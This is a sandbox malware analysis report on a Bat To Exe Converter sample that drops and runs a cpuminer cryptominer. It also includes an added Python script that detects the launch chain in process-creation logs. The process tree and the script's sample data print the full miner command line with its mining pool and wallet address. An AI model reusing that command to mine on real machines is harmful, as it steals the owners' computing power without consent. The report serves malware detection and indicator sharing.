Analysis
- max time kernel: 295s
- max time network: 301s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-ja
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system:windows
- submitted: 19/02/2024, 19:07
Behavioral task: behavioral1
- Sample: batexe.exe
- Resource: win10-20240214-ja
Behavioral task: behavioral2
- Sample: batexe.exe
- Resource: win10v2004-20231215-ja
General
- Target: batexe.exe
- Size: 9.4MB
- MD5: cdc9eacffc6d2bf43153815043064427
- SHA1: d05101f265f6ea87e18793ab0071f5c99edf363f
- SHA256: 73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
- SHA512: fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
- SSDEEP: 196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  - Key value queried: \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation (process: batexe.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation (process: b2e.exe)
- Executes dropped EXE (2 IoCs)
  - PID 1160: b2e.exe
  - PID 3252: cpuminer-sse2.exe
- Loads dropped DLL (5 IoCs)
  - PID 3252: cpuminer-sse2.exe (5 DLL loads)
- YARA rule match
  - resource behavioral2/memory/1744-8-0x0000000000400000-0x000000000393A000-memory.dmp: rule upx
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (8 IoCs)
  - PID 1744 (batexe.exe) wrote to memory of PID 1160, target procid 72 (3 events)
  - PID 1160 (b2e.exe) wrote to memory of PID 1640, target procid 86 (3 events)
  - PID 1640 (cmd.exe) wrote to memory of PID 3252, target procid 89 (2 events)
Processes
- C:\Users\Admin\AppData\Local\Temp\batexe.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  PID: 1744
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    PID: 1160
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5BFB.tmp\batchfile.bat" "
      PID: 1640
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
        Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
        PID: 3252
        - Executes dropped EXE
        - Loads dropped DLL
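The chain above is the usual shape of a Bat To Exe Converter payload: the stub unpacks itself to %TEMP%\<4 hex digits>.tmp\b2e.exe, runs the embedded batch file through cmd.exe (the SysWOW64 copy, because the 32-bit stub is subject to WOW64 file-system redirection even though the command line names system32), and the batch file starts a yespower miner against a zpool.ca stratum endpoint. The script below is an added example, not part of the tria.ge report and not the sample's own code: it runs the chain detection over constructed process-creation records in the shape of Sysmon Event ID 1 (pid, ppid, image, command line). The pids, paths and command lines are copied from the process tree and the WriteProcessMemory IoCs; the parent pid 900 of batexe.exe and the final benign cmd.exe record are made up for contrast, and the reading of "c=doge" as a zpool payout-coin selector is an assumption about pool convention rather than something the report states.

```python
"""Hunt for the Bat-To-Exe -> cmd.exe -> cpuminer chain shown in this report.

Added example, not part of the tria.ge report. EVENTS is constructed sample
input shaped like Sysmon Event ID 1; pids, paths and command lines come from
the process tree above, ppid 900 and the last (benign) record are invented.
"""
import re
from urllib.parse import urlsplit

EVENTS = [  # constructed sample input
    {"pid": 1744, "ppid": 900,  # ppid 900 is an assumed explorer.exe, not from the report
     "image": r"C:\Users\Admin\AppData\Local\Temp\batexe.exe",
     "command_line": r'"C:\Users\Admin\AppData\Local\Temp\batexe.exe"'},
    {"pid": 1160, "ppid": 1744,
     "image": r"C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe",
     "command_line": r'"C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe" '
                     r'C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe '
                     r'C:\Users\Admin\AppData\Local\Temp '
                     r'"C:\Users\Admin\AppData\Local\Temp\batexe.exe"'},
    {"pid": 1640, "ppid": 1160,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "command_line": r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5BFB.tmp\batchfile.bat" "'},
    {"pid": 3252, "ppid": 1640,
     "image": r"C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe",
     "command_line": "cpuminer-sse2.exe -a yespower "
                     "-o stratum+tcp://yespower.sea.mine.zpool.ca:6234 "
                     "--userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3"},
    {"pid": 5000, "ppid": 900,  # benign shell, constructed for contrast
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"C:\Windows\System32\cmd.exe /c dir"},
]

# Bat To Exe Converter unpacks its stub to %TEMP%\<4 hex>.tmp\b2e.exe.
B2E_STUB = re.compile(r"\\AppData\\Local\\Temp\\[0-9A-F]{4}\.tmp\\b2e\.exe$", re.I)
# cpuminer-style options that take a separate value token ("-x value").
VALUE_OPTS = {"-a", "--algo", "-o", "--url", "-O", "--userpass",
              "-u", "--user", "-p", "--pass", "-t", "--threads"}


def parse_miner_cmdline(cmdline):
    """Extract pool, algorithm, wallet and payout coin from a cpuminer-style
    command line. Returns None unless a stratum pool URL is present."""
    tokens = cmdline.split()
    opts, i = {}, 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--") and "=" in tok:            # --name=value
            name, value = tok[2:].split("=", 1)
            opts[name] = value
        elif tok in VALUE_OPTS and i + 1 < len(tokens):   # -x value
            opts[tok.lstrip("-")] = tokens[i + 1]
            i += 1
        i += 1
    url = opts.get("o") or opts.get("url")
    if not url or not url.lower().startswith("stratum"):
        return None
    parts = urlsplit(url)                 # urlsplit handles stratum+tcp:// netlocs
    userpass = opts.get("O") or opts.get("userpass")
    if userpass:
        wallet, _, password = userpass.partition(":")
    else:
        wallet = opts.get("u") or opts.get("user")
        password = opts.get("p") or opts.get("pass")
    # Assumption: zpool.ca picks the payout currency via a "c=<coin>" password.
    payout = password[2:] if password and password.startswith("c=") else None
    threads = opts.get("t") or opts.get("threads")
    return {"pool_host": parts.hostname, "pool_port": parts.port,
            "algo": opts.get("a") or opts.get("algo"), "wallet": wallet,
            "payout_coin": payout, "threads": int(threads) if threads else None}


def find_miner_chains(events, max_depth=8):
    """Flag every process with a stratum miner command line, walk its ancestry
    via ppid, and mark chains that passed through a b2e.exe stub and a cmd.exe
    running a .bat file, as in this report."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        miner = parse_miner_cmdline(ev["command_line"])
        if miner is None:
            continue
        chain, cur = [], ev
        while cur is not None and len(chain) < max_depth:   # max_depth guards pid reuse loops
            chain.append(cur)
            cur = by_pid.get(cur["ppid"])
        via_b2e = any(B2E_STUB.search(a["image"]) for a in chain)
        via_bat = any(a["image"].lower().endswith("\\cmd.exe")
                      and ".bat" in a["command_line"].lower() for a in chain)
        hits.append({"pid": ev["pid"], "miner": miner,
                     "ancestry": [a["image"].rsplit("\\", 1)[-1] for a in chain],
                     "bat_to_exe_launcher": via_b2e and via_bat})
    return hits


if __name__ == "__main__":
    for hit in find_miner_chains(EVENTS):
        print(hit)
```

Run against the constructed records it reports one hit, PID 3252, with ancestry cpuminer-sse2.exe, cmd.exe, b2e.exe, batexe.exe, pool yespower.sea.mine.zpool.ca:6234, algorithm yespower and the wallet from the command line; the benign cmd.exe record produces nothing. The wallet address and pool host are the durable indicators here: the %TEMP% directory names (594B.tmp, 5BFB.tmp) are random per run, which is why the stub pattern matches on the four-hex-digit .tmp shape rather than a fixed path.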
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 587KB
  MD5: fea1c01b23aa64a9ec039112ed7ed8bf
  SHA1: 2e4d9e66d1bf77e8cc98f8448a95583d937e1479
  SHA256: cec04776370255aad7163575583cdcc2ad44bf493a013bf72779b000e4d12f4a
  SHA512: 4b2af6494bc407c92533ee11ec9fe15a03ff9deb7cf4bd8d73c522f9291ac45a4fc743d4fe370b6fcd032303384ff80f9789bc98117ef7567b64f926574bf0bb
- Filesize: 311KB
  MD5: c25f078d854b6eecafea08422d400be9
  SHA1: d1fd6dde1ce96d9d271d3ded78e08a05c079460b
  SHA256: 5eb351b2b0126a67614e4a649255ea3fcebb8b8f29966e4ec41b91b28f5e8fa8
  SHA512: c32a82e23b57c2270078fd1e6819c723c1f270e61e3eae738178898d0d5c5023252b7638ee0753e311fbd955a7e5967a8087917f56e4b4d6728580e462ab35f0
- Filesize: 383KB
  MD5: a0722090ec22ddd524394dc8a29b881f
  SHA1: 9dc74e600c470551f9502e0d2c8d1ab8cefb9d25
  SHA256: 79832d1aaefb4351b534f10e5731790f044bfd367e9a428b1e3b7bae437cc743
  SHA512: 6b0aafcd8e74c5b13adc2a37141730f18dcf67e148601d6b62e18030322834d86af8d618175069d5c24400bd4beaa73f04e9864df03ff70064bb3f7ff1193d89
- Filesize: 136B
  MD5: 8ea7ac72a10251ecfb42ef4a88bd330a
  SHA1: c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
  SHA256: 65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
  SHA512: a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
- Filesize: 342KB
  MD5: ef8bd5632886c483d385a61fbd471188
  SHA1: 492d35371807a1c2d45a106a6cdc054c03b68d82
  SHA256: 20721371bfe84a0829c53f675839877dca6b871e794b3cf38db6a2a522921355
  SHA512: 35d55320417832a1f7c7d878068dc39c39859967a3d305c0557ae6e35c77298e629f66f64c33ba5f5d10dad6311dcc6225c427d31f3a6a72c2e07a2afe82c7aa
- Filesize: 333KB
  MD5: 325eddc9f624b8f5b43f95c3fdf1e50c
  SHA1: b1253f1ac79f179bcae6d6f2dd865005b5f263a9
  SHA256: 46abf0be4bd961acb71f309ea81a1ecf5529175da2dd04492db3f1f44dda90e8
  SHA512: e8aca9915ef2b842b46a4fa7487ae564b454320002c52e60c1a069f7041ea032cb9a0eb833b64a43b6dafd463d94013f8d3acca4fb8d622e3a5ebdc62c6f734a
- Filesize: 320KB
  MD5: 9abc2d6fe180a37b542f3bf99c5d8a02
  SHA1: 5e790ae05ec1b186913b623aced47d297624505e
  SHA256: eb1c9a5381930635bc73148bf8e4110f8d63016c12c2e0fae83250f9c448a355
  SHA512: 14edf6aecd8d06274489862a2c9c3f44e88cf151de58fe80499747a5f702635496a29e290f3e6f09241861024c12a570b20e44367e19326824ed20edb64c98b6
- Filesize: 455KB
  MD5: 70da085c27d57f71eb905742c625bac0
  SHA1: c752c4959659f55f3f97368472af78cb32c3811b
  SHA256: afed1d669d4bc37657f90f6c5cb95942de9817f0e14aa480fce13baa63605229
  SHA512: 6d0c5cf24488df40331e14ebba10f63f7d43d9399ee427d02cb3d400abaf8ee7c3538a34ce8b6769aaf90c013d6237f579901b20d7bb8c7d79618bff49653a14
- Filesize: 29KB
  MD5: 16346bed1eda23c10aedf446308160fd
  SHA1: 8f3c2504ecea24d623de72be6a1f3f88ab81c39b
  SHA256: 4b3adf842053b2176220b6d8c772e10f2069cb8c332b26b0d80728d607007b83
  SHA512: 4d0764f8d27dcea55db6d5abffe679af5676c1e636f0bcc044a2898e8dbd4c2de5203b37b84a5825a7c43aa888d60921ec9000ca070f08b83759bd4424f1d07d
- Filesize: 342KB
  MD5: 5e927cbf1c58ff2a9e6387b5449a594b
  SHA1: 41878ce55789632331c2665529a0a3349c8ed70d
  SHA256: ee31afeba5011c397cfde20da4417b04ac4893164ca820d94f49e3016876579a
  SHA512: fb6458232802bd33f8532813ed08065c73cd66ec27d7ca61f51d2f595a854d1120e35ae37d34ee64bf8d936ddbb3ca82d80dfff7fe4aa50a820790019b0e7562
- Filesize: 32KB
  MD5: b5ee2ecfeb4202d3e8b80c60fe8c98f4
  SHA1: f4c7678c3241776d53736f224f09d2cd49ec0876
  SHA256: c8095b7b9c67c5c3106a7469febc09bba50b3a384bfb98bf0fba0a4a22c36844
  SHA512: 17190c52d497237abec71f569306b8f9cc36104ef89f002ab366702892cfae8311a7f4ac5ecb410b173932d3c5f3ebd0b16158d26a0e90c9dc029b3e805db543
- Filesize: 434KB
  MD5: d9e4de1938ccdb97fb8c64bdc6732248
  SHA1: 50906c7ac7f0b4b55d5aa79aadc1c8e62f872094
  SHA256: bd55e9678c616c987e26a3e026f76def805da213378697d8497ed7c6a94a619f
  SHA512: 18274322fe30feaac75cb73a620691b866a0ece502f81728f018e99c4d7f15e8b600834ad2519b575af132c597b58e14e3bd7e4a6c01d1df431cd0fe179b5491
- Filesize: 149KB
  MD5: 31325ee097b2686dd3f7ed3c46dca632
  SHA1: b0f57a72c2b5d73f2a3b64937f3c442d4c1892b0
  SHA256: a8695fed44df7301297f77490b02ecb540f18663e0023f9bbe956e9ab1adada8
  SHA512: 0b6b4ebd9c5437aee23455b1aa41814b413a9f8fb6257ddb7984254aa0c2fe6b50bc8829eed15295bce4b0c7476732a8f2f660cb72587f639c29bc63b8cc64f7
- Filesize: 368KB
  MD5: ef47272543eba722b4d8e902431e4208
  SHA1: df59be565b9051a17c7c21bf9e50dc5c1dc29078
  SHA256: 8f46f6941285af191a1fe2c89f15c65cdfe3986772245ffa37ed8dabe9c6c8c6
  SHA512: 4c00a1db992be74e6c50793a8cd9a6e7598190f761837553fa7e97403c15ffc232fa3332a93dab9642affaeda472e4ae17cae3ce463041f1a251a11829944e29
- Filesize: 367KB
  MD5: 41217be4144b5551c1b2df7e883b01fa
  SHA1: a8fa0c068233d97656d878d29303b39af2721fbd
  SHA256: d16b777fa8214b8fa07e483ff5f1fdd808fa7779d0b3904642a36d8dcf4fb688
  SHA512: e14e8f8e9d2be69ce414c1a9ae01e6257f0b61a7ff07a38c34f541c024b651df1f147cfeb5e14162f8f1a6002b2c0f56f9e868084223faa4e486237ba4c8204a